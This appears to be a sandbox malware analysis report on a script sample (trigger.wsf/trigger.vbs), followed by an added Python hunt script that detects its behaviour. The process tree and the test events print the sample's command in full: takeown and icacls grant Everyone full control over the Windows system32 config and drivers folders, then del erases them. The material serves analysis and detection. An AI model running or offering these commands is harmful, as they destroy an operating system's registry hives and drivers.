Analysis

max time kernel: 93s
max time network: 95s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 15-08-2024 21:18

Static task: static1
Behavioral task: behavioral1
  Sample: trigger.wsf
  Resource: win10v2004-20240802-en
  0 signatures, 150 seconds
General

Target: trigger.wsf
Size: 1KB
MD5: a5db60d9ff56ef8720d8ed2d9e3d1c40
SHA1: edf26211e76a660f1b4d514000f5b2b12b0b4441
SHA256: 22ddb640309560907cba8c9dc61f15929a88952043411cb95a707fd44a238282
SHA512: f1437706f46e3e3daaed930c5c12ea1f05e947ab691083ac9968357e84034d9f99ffb07fc3d8fea36d04a12ff4adf133f93aa931e1b9fec9ef9e509eabc9244b
Malware Config
Signatures

Possible privilege escalation attempt (8 IoCs)
  pid   process
  920   icacls.exe
  3772  takeown.exe
  1888  takeown.exe
  2784  icacls.exe
  652   icacls.exe
  2184  takeown.exe
  3384  takeown.exe
  2860  icacls.exe

Modifies file permissions (1 TTPs, 8 IoCs)
  pid   process
  3384  takeown.exe
  2860  icacls.exe
  920   icacls.exe
  3772  takeown.exe
  1888  takeown.exe
  2784  icacls.exe
  652   icacls.exe
  2184  takeown.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description                      pid   process
  Token: SeTakeOwnershipPrivilege  3384  takeown.exe

Suspicious use of WriteProcessMemory (24 IoCs)
  description                         pid   process      target process
  PID 5032 wrote to memory of 1720    5032  WScript.exe  cmd.exe
  PID 5032 wrote to memory of 1720    5032  WScript.exe  cmd.exe
  PID 5032 wrote to memory of 3744    5032  WScript.exe  cmd.exe
  PID 5032 wrote to memory of 3744    5032  WScript.exe  cmd.exe
  PID 1720 wrote to memory of 2184    1720  cmd.exe      takeown.exe
  PID 1720 wrote to memory of 2184    1720  cmd.exe      takeown.exe
  PID 3744 wrote to memory of 3384    3744  cmd.exe      takeown.exe
  PID 3744 wrote to memory of 3384    3744  cmd.exe      takeown.exe
  PID 1720 wrote to memory of 2860    1720  cmd.exe      icacls.exe
  PID 1720 wrote to memory of 2860    1720  cmd.exe      icacls.exe
  PID 3744 wrote to memory of 920     3744  cmd.exe      icacls.exe
  PID 3744 wrote to memory of 920     3744  cmd.exe      icacls.exe
  PID 3476 wrote to memory of 1768    3476  WScript.exe  cmd.exe
  PID 3476 wrote to memory of 1768    3476  WScript.exe  cmd.exe
  PID 3476 wrote to memory of 2424    3476  WScript.exe  cmd.exe
  PID 3476 wrote to memory of 2424    3476  WScript.exe  cmd.exe
  PID 1768 wrote to memory of 3772    1768  cmd.exe      takeown.exe
  PID 1768 wrote to memory of 3772    1768  cmd.exe      takeown.exe
  PID 2424 wrote to memory of 1888    2424  cmd.exe      takeown.exe
  PID 2424 wrote to memory of 1888    2424  cmd.exe      takeown.exe
  PID 2424 wrote to memory of 2784    2424  cmd.exe      icacls.exe
  PID 2424 wrote to memory of 2784    2424  cmd.exe      icacls.exe
  PID 1768 wrote to memory of 652     1768  cmd.exe      icacls.exe
  PID 1768 wrote to memory of 652     1768  cmd.exe      icacls.exe
Processes

C:\Windows\System32\WScript.exe  (PID 2556)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

C:\Windows\System32\rundll32.exe  (PID 1064)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe  (PID 5032)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 1720)
    "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\takeown.exe  (PID 2184)
      takeown /f c:\windows\system32\config\*
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\icacls.exe  (PID 2860)
      icacls c:\windows\system32\config\* /grant everyone:(f)
      - Possible privilege escalation attempt
      - Modifies file permissions

  C:\Windows\System32\cmd.exe  (PID 3744)
    "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\takeown.exe  (PID 3384)
      takeown /f c:\windows\system32\drivers\*
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe  (PID 920)
      icacls c:\windows\system32\drivers\* /grant everyone:(f)
      - Possible privilege escalation attempt
      - Modifies file permissions

C:\Windows\System32\WScript.exe  (PID 3476)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 1768)
    "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\takeown.exe  (PID 3772)
      takeown /f c:\windows\system32\config\*
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\icacls.exe  (PID 652)
      icacls c:\windows\system32\config\* /grant everyone:(f)
      - Possible privilege escalation attempt
      - Modifies file permissions

  C:\Windows\System32\cmd.exe  (PID 2424)
    "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\takeown.exe  (PID 1888)
      takeown /f c:\windows\system32\drivers\*
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\icacls.exe  (PID 2784)
      icacls c:\windows\system32\drivers\* /grant everyone:(f)
      - Possible privilege escalation attempt
      - Modifies file permissions
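A hunt for the chain the process tree above shows: WScript.exe spawns cmd.exe, which runs takeown.exe and icacls.exe against c:\windows\system32\config\* and c:\windows\system32\drivers\*, granting Everyone full control before del. This is an added example, not part of the sandbox report or of the sample. It rebuilds a process tree from process-creation records and flags the takeown/icacls children of a script-hosted cmd.exe that touch protected paths. The records are constructed: the PIDs, images and command lines are those of the report's PID 5032 branch, while the record layout, the explorer.exe parent (PID 1000) and the benign logon.vbs branch are assumptions.

```python
"""Hunt for the takeown -> icacls -> del chain from the trigger.wsf report.

Added example, not part of the sandbox report. Records below are constructed:
PIDs, images and command lines follow the report's PID 5032 branch; the record
layout, the explorer.exe parent (PID 1000) and the benign branch are assumed.
"""
import re
from dataclasses import dataclass, field

# Directories no script should be re-ACLing. Matched case-insensitively as substrings.
PROTECTED_PATHS = (r"c:\windows\system32\config", r"c:\windows\system32\drivers")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    children: list = field(default_factory=list)


def basename(image: str) -> str:
    return image.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def touches_protected_path(cmdline: str) -> bool:
    return any(p in cmdline.lower() for p in PROTECTED_PATHS)


def grants_everyone_full(cmdline: str) -> bool:
    # icacls ... /grant everyone:(f), or the SID form /grant *S-1-1-0:(F)
    return re.search(r"/grant(:r)?\s+(everyone|\*s-1-1-0):\(?f\)?", cmdline.lower()) is not None


def build_tree(events):
    procs = {e["pid"]: Proc(e["pid"], e["ppid"], e["image"], e["cmdline"]) for e in events}
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def find_acl_tampering(events):
    """Return (host_pid, cmd_pid, tool_pid, reason) for every script host -> cmd.exe ->
    takeown/icacls chain that rewrites ownership or ACLs under a protected path."""
    findings = []
    for host in build_tree(events).values():
        if basename(host.image) not in SCRIPT_HOSTS:
            continue
        for shell in host.children:
            if basename(shell.image) != "cmd.exe":
                continue
            for tool in shell.children:
                name = basename(tool.image)
                if name == "takeown.exe" and touches_protected_path(tool.cmdline):
                    findings.append((host.pid, shell.pid, tool.pid, "takeown on protected path"))
                elif name == "icacls.exe" and touches_protected_path(tool.cmdline) and grants_everyone_full(tool.cmdline):
                    findings.append((host.pid, shell.pid, tool.pid, "icacls grants Everyone (F) on protected path"))
    return findings


CFG = r"c:\windows\system32\config\*"
DRV = r"c:\windows\system32\drivers\*"


def _oneliner(path: str) -> str:
    # The cmd.exe command line from the report. 'del' is a cmd builtin, so it never appears as a child process.
    return f'"C:\\Windows\\System32\\cmd.exe" /c takeown /f {path} >nul && icacls {path} /grant everyone:(f) >nul && del /s /q {path} >nul 2>&1'


REPORT_EVENTS = [  # constructed from the WScript.exe PID 5032 branch of the report
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},  # parent assumed
    {"pid": 5032, "ppid": 1000, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"'},
    {"pid": 1720, "ppid": 5032, "image": r"C:\Windows\System32\cmd.exe", "cmdline": _oneliner(CFG)},
    {"pid": 2184, "ppid": 1720, "image": r"C:\Windows\system32\takeown.exe", "cmdline": f"takeown /f {CFG}"},
    {"pid": 2860, "ppid": 1720, "image": r"C:\Windows\system32\icacls.exe", "cmdline": f"icacls {CFG} /grant everyone:(f)"},
    {"pid": 3744, "ppid": 5032, "image": r"C:\Windows\System32\cmd.exe", "cmdline": _oneliner(DRV)},
    {"pid": 3384, "ppid": 3744, "image": r"C:\Windows\system32\takeown.exe", "cmdline": f"takeown /f {DRV}"},
    {"pid": 920, "ppid": 3744, "image": r"C:\Windows\system32\icacls.exe", "cmdline": f"icacls {DRV} /grant everyone:(f)"},
]

BENIGN_EVENTS = [  # constructed: a logon script re-ACLing a user folder must not fire
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 1000, "image": r"C:\Windows\System32\WScript.exe", "cmdline": '"C:\\Windows\\System32\\WScript.exe" logon.vbs'},
    {"pid": 4101, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c icacls C:\Users\Admin\share /grant Admin:(R)"},
    {"pid": 4102, "ppid": 4101, "image": r"C:\Windows\system32\icacls.exe", "cmdline": r"icacls C:\Users\Admin\share /grant Admin:(R)"},
]

if __name__ == "__main__":
    for host, shell, tool, why in find_acl_tampering(REPORT_EVENTS):
        print(f"WScript {host} -> cmd {shell} -> PID {tool}: {why}")
    print("benign:", find_acl_tampering(BENIGN_EVENTS))
```

The del step never shows up as a process because del is a cmd builtin, so the only evidence of the intended deletion is the cmd.exe command line; the rule therefore keys on the ACL-rewriting tools rather than on a delete event. takeown also needs SeTakeOwnershipPrivilege, which the report records once (PID 3384) under AdjustPrivilegeToken, so correlating that token event with the tree is a second, independent signal for the same chain.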